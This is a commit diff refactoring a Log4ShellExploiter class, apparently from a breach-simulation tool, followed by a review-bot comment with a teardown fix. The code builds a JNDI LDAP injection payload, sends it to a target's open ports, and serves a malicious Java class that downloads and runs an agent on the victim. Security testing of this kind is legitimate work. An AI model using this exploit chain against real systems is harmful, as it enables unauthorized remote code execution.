Agent: Prefix private methods/variables with _ in Log4ShellExploiter
parent
8f53a5ccd0
commit
3bbf4f9ac6
|
@ -38,69 +38,69 @@ class Log4ShellExploiter(WebRCE):
|
||||||
def __init__(self, host: VictimHost):
|
def __init__(self, host: VictimHost):
|
||||||
super().__init__(host)
|
super().__init__(host)
|
||||||
|
|
||||||
self.ldap_port = get_free_tcp_port()
|
self._ldap_port = get_free_tcp_port()
|
||||||
|
|
||||||
self.class_http_server_ip = get_interface_to_target(self.host.ip_addr)
|
self._class_http_server_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
self.class_http_server_port = get_free_tcp_port()
|
self.class_http_server_port = get_free_tcp_port()
|
||||||
|
|
||||||
self.ldap_server = None
|
self._ldap_server = None
|
||||||
self.ldap_server_thread = None
|
self._ldap_server_thread = None
|
||||||
self.exploit_class_http_server = None
|
self._exploit_class_http_server = None
|
||||||
self.exploit_class_http_server_thread = None
|
self._exploit_class_http_server_thread = None
|
||||||
self.agent_http_server_thread = None
|
self._agent_http_server_thread = None
|
||||||
|
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
self.start_servers()
|
self._start_servers()
|
||||||
try:
|
try:
|
||||||
return self.exploit(None, None)
|
return self.exploit(None, None)
|
||||||
finally:
|
finally:
|
||||||
self.stop_servers()
|
self._stop_servers()
|
||||||
|
|
||||||
def start_servers(self):
|
def _start_servers(self):
|
||||||
# Start http server, to serve agent to victims
|
# Start http server, to serve agent to victims
|
||||||
paths = self.get_monkey_paths()
|
paths = self.get_monkey_paths()
|
||||||
agent_http_path = self.start_agent_http_server(paths)
|
agent_http_path = self._start_agent_http_server(paths)
|
||||||
|
|
||||||
# Build agent execution command
|
# Build agent execution command
|
||||||
command = self.build_command(paths["dest_path"], agent_http_path)
|
command = self._build_command(paths["dest_path"], agent_http_path)
|
||||||
|
|
||||||
# Start http server to serve malicious java class to victim
|
# Start http server to serve malicious java class to victim
|
||||||
self.start_class_http_server(command)
|
self._start_class_http_server(command)
|
||||||
|
|
||||||
# Start ldap server to redirect ldap query to java class server
|
# Start ldap server to redirect ldap query to java class server
|
||||||
self.start_ldap_server()
|
self._start_ldap_server()
|
||||||
|
|
||||||
def start_agent_http_server(self, agent_paths: dict) -> str:
|
def _start_agent_http_server(self, agent_paths: dict) -> str:
|
||||||
# Create server for http download and wait for it's startup.
|
# Create server for http download and wait for it's startup.
|
||||||
http_path, http_thread = HTTPTools.create_locked_transfer(
|
http_path, http_thread = HTTPTools.create_locked_transfer(
|
||||||
self.host, agent_paths["src_path"]
|
self.host, agent_paths["src_path"]
|
||||||
)
|
)
|
||||||
self.agent_http_server_thread = http_thread
|
self._agent_http_server_thread = http_thread
|
||||||
if not http_path:
|
if not http_path:
|
||||||
logger.debug("Exploiter failed, couldn't start an http server to serve agent.")
|
logger.debug("Exploiter failed, couldn't start an http server to serve agent.")
|
||||||
raise Exception("Http server creation failed")
|
raise Exception("Http server creation failed")
|
||||||
logger.info("Started http server on %s", http_path)
|
logger.info("Started http server on %s", http_path)
|
||||||
return http_path
|
return http_path
|
||||||
|
|
||||||
def start_class_http_server(self, command: str):
|
def _start_class_http_server(self, command: str):
|
||||||
java_class = self.build_java_class(command)
|
java_class = self._build_java_class(command)
|
||||||
|
|
||||||
self.exploit_class_http_server = ExploitClassHTTPServer(
|
self._exploit_class_http_server = ExploitClassHTTPServer(
|
||||||
self.class_http_server_ip, self.class_http_server_port, java_class
|
self._class_http_server_ip, self.class_http_server_port, java_class
|
||||||
)
|
)
|
||||||
# Setting `daemon=True` to save ourselves some trouble when this is merged to the
|
# Setting `daemon=True` to save ourselves some trouble when this is merged to the
|
||||||
# agent-refactor branch.
|
# agent-refactor branch.
|
||||||
# TODO: Make a call to `create_daemon_thread()` instead of calling the `Thread()`
|
# TODO: Make a call to `create_daemon_thread()` instead of calling the `Thread()`
|
||||||
# constructor directly after merging to the agent-refactor branch.
|
# constructor directly after merging to the agent-refactor branch.
|
||||||
self.exploit_class_http_server_thread = Thread(
|
self._exploit_class_http_server_thread = Thread(
|
||||||
target=self.exploit_class_http_server.run, daemon=True
|
target=self._exploit_class_http_server.run, daemon=True
|
||||||
)
|
)
|
||||||
self.exploit_class_http_server_thread.start()
|
self._exploit_class_http_server_thread.start()
|
||||||
|
|
||||||
def start_ldap_server(self):
|
def _start_ldap_server(self):
|
||||||
self.ldap_server = LDAPExploitServer(
|
self._ldap_server = LDAPExploitServer(
|
||||||
ldap_server_port=self.ldap_port,
|
ldap_server_port=self._ldap_port,
|
||||||
http_server_ip=self.class_http_server_ip,
|
http_server_ip=self._class_http_server_ip,
|
||||||
http_server_port=self.class_http_server_port,
|
http_server_port=self.class_http_server_port,
|
||||||
storage_dir=get_monkey_dir_path(),
|
storage_dir=get_monkey_dir_path(),
|
||||||
)
|
)
|
||||||
|
@ -109,26 +109,26 @@ class Log4ShellExploiter(WebRCE):
|
||||||
# agent-refactor branch.
|
# agent-refactor branch.
|
||||||
# TODO: Make a call to `create_daemon_thread()` instead of calling the `Thread()`
|
# TODO: Make a call to `create_daemon_thread()` instead of calling the `Thread()`
|
||||||
# constructor directly after merging to the agent-refactor branch.
|
# constructor directly after merging to the agent-refactor branch.
|
||||||
self.ldap_server_thread = Thread(target=self.ldap_server.run, daemon=True)
|
self._ldap_server_thread = Thread(target=self._ldap_server.run, daemon=True)
|
||||||
self.ldap_server_thread.start()
|
self._ldap_server_thread.start()
|
||||||
|
|
||||||
def stop_servers(self):
|
def _stop_servers(self):
|
||||||
logger.debug("Stopping all LDAP and HTTP Servers")
|
logger.debug("Stopping all LDAP and HTTP Servers")
|
||||||
self.agent_http_server_thread.stop()
|
self._agent_http_server_thread.stop()
|
||||||
self.agent_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
self._agent_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||||
|
|
||||||
self.exploit_class_http_server.stop()
|
self._exploit_class_http_server.stop()
|
||||||
self.exploit_class_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
self._exploit_class_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||||
|
|
||||||
self.ldap_server.stop()
|
self._ldap_server.stop()
|
||||||
self.ldap_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
self._ldap_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||||
|
|
||||||
def build_ldap_payload(self):
|
def _build_ldap_payload(self):
|
||||||
interface_ip = get_interface_to_target(self.host.ip_addr)
|
interface_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
|
return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
|
||||||
|
|
||||||
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
||||||
def build_command(self, path, http_path):
|
def _build_command(self, path, http_path):
|
||||||
# Build command to execute
|
# Build command to execute
|
||||||
monkey_cmd = build_monkey_commandline(
|
monkey_cmd = build_monkey_commandline(
|
||||||
self.host, get_monkey_depth() - 1, vulnerable_port=None
|
self.host, get_monkey_depth() - 1, vulnerable_port=None
|
||||||
|
@ -145,7 +145,7 @@ class Log4ShellExploiter(WebRCE):
|
||||||
"parameters": monkey_cmd,
|
"parameters": monkey_cmd,
|
||||||
}
|
}
|
||||||
|
|
||||||
def build_java_class(self, exploit_command: str) -> bytes:
|
def _build_java_class(self, exploit_command: str) -> bytes:
|
||||||
if "linux" in self.host.os["type"]:
|
if "linux" in self.host.os["type"]:
|
||||||
return build_exploit_bytecode(exploit_command, LINUX_EXPLOIT_TEMPLATE_PATH)
|
return build_exploit_bytecode(exploit_command, LINUX_EXPLOIT_TEMPLATE_PATH)
|
||||||
else:
|
else:
|
||||||
|
@ -159,12 +159,12 @@ class Log4ShellExploiter(WebRCE):
|
||||||
]
|
]
|
||||||
for exploit in get_log4shell_service_exploiters():
|
for exploit in get_log4shell_service_exploiters():
|
||||||
for port in open_ports:
|
for port in open_ports:
|
||||||
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
|
exploit.trigger_exploit(self._build_ldap_payload(), self.host, port)
|
||||||
|
|
||||||
# Wait for request
|
# Wait for request
|
||||||
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
|
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
|
||||||
|
|
||||||
if self.exploit_class_http_server.exploit_class_downloaded():
|
if self._exploit_class_http_server.exploit_class_downloaded():
|
||||||
self.exploit_info["vulnerable_service"] = {
|
self.exploit_info["vulnerable_service"] = {
|
||||||
"service_name": exploit.service_name,
|
"service_name": exploit.service_name,
|
||||||
"port": port,
|
"port": port,
|
||||||
|
|
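Review bot: `_start_servers()` is still called before the `try` in `_exploit_host`, so if the class HTTP server or the LDAP server fails to start after the agent HTTP server is already up, `_stop_servers()` never runs and the listeners serving the agent binary and the exploit class are left running on the host. Moving the call inside the `try` is not enough on its own, because `_stop_servers()` dereferences attributes that `__init__` sets to `None`; each stop/join pair needs a guard on its thread attribute, as sketched below. Separately, `class_http_server_port` kept its public name while `_class_http_server_ip` and `_ldap_port` were made private; if that is not deliberate, rename it to `_class_http_server_port` in `__init__`, `_start_class_http_server` and `_start_ldap_server`. Part of `_start_ldap_server` lies between the first two hunks and is not visible here, so the guards assume a thread attribute is only set once its server object exists.

```python
def _exploit_host(self):
    try:
        # Inside the try so a partial start-up is still torn down.
        self._start_servers()
        return self.exploit(None, None)
    finally:
        self._stop_servers()

def _stop_servers(self):
    logger.debug("Stopping all LDAP and HTTP Servers")
    # Only stop what was actually started; every attribute is None until its
    # _start_* method has run.
    if self._agent_http_server_thread is not None:
        self._agent_http_server_thread.stop()
        self._agent_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)

    if self._exploit_class_http_server_thread is not None:
        self._exploit_class_http_server.stop()
        self._exploit_class_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)

    if self._ldap_server_thread is not None:
        self._ldap_server.stop()
        self._ldap_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
```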